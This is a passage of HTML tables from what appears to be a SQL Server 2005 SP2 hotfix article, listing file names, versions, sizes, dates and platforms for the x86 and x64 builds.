class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1628184</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.scripttask.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">160792</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.scripttaskui.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">62488</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.servicebrokerenum.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">42008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.smo.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1606680</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.smoenum.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">222232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.sqlenum.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">898072</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.transfersqlserverobjectstask.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">95256</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msadomdx.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">502296</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msdtssrvr.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">205848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msgprox.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">200216</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdlocal.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">15973912</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdredir.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">4022808</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdspdm.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">201752</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdsrv.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">14944280</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmgdsrv.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6046232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msolap90.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">4300312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nsservice.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">21528</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">osql.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">53784</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replerrx.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">114712</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replisapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">272920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replprov.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">554520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replrec.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">786968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">408088</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.application</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">18796</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">5616664</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.exe.manifest</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">45326</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1066008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1070104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1070104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1082392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1090584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1090584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1094680</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1094680</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1143832</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilderlocalintranet.application</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">18848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilderlocalintranet.exe.manifest</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">37420</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesemaildeliveryprovider.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">82968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceslibrary.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1119256</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeserver.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">133144</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesservice.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">16920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebserver.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1725464</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebuserinterface.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1332248</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswmi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">3382296</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rsclientprint.cab</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1185621</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sac.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">82968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlbrowser.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">242712</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlcmd.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">143896</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqldiag.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1074712</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqldumper.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">68632</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmanagerui.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6083608</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmgmprovider.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">236568</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlsac.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1246232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlsqm.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">140312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwb.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">823832</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwtsn.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">99352</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssradd.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">42520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssravg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">43032</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmax.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">40984</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">40984</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrpub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">30232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">svrenumapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">614936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txagg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">204312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txlookup.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">244760</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txmergejoin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">140824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">194584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For x64-based versions of the SQL Server 2005 Service Pack 2 hotfix</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">autoadmin90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">901656</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">bcp.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">88088</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">chsbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">1694056</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">chtbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">6109032</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">connectiondlg.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">959512</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">databasemailengine.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">78872</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">databasemailprotocols.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">46104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">distrib.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">86552</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dts.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1102360</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dts.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1893400</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtsconn.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">250392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtsconn.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">408088</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtspipeline.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">605208</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtspipeline.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1065496</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfiledest.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">256024</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfiledest.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">420888</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfilesrc.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">264728</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfilesrc.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">430616</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">fteref.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">433152</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">infosoft.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">621416</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">korwbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">101736</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">langwrbk.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">236904</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">logread.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">525848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">mergetxt.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">32280</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">mergetxt.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">37912</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.controls.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">2765848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.design.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">5456920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1217560</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.managementdialogs.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1717272</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.wizards.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6161432</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.datawarehouse.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1279000</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">160792</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.sapbw.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">42008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.xmlaclient.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">562200</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.designer.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">4817944</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.designer.wizards.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">2221080</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">799768</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.excelrendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">336920</td><td 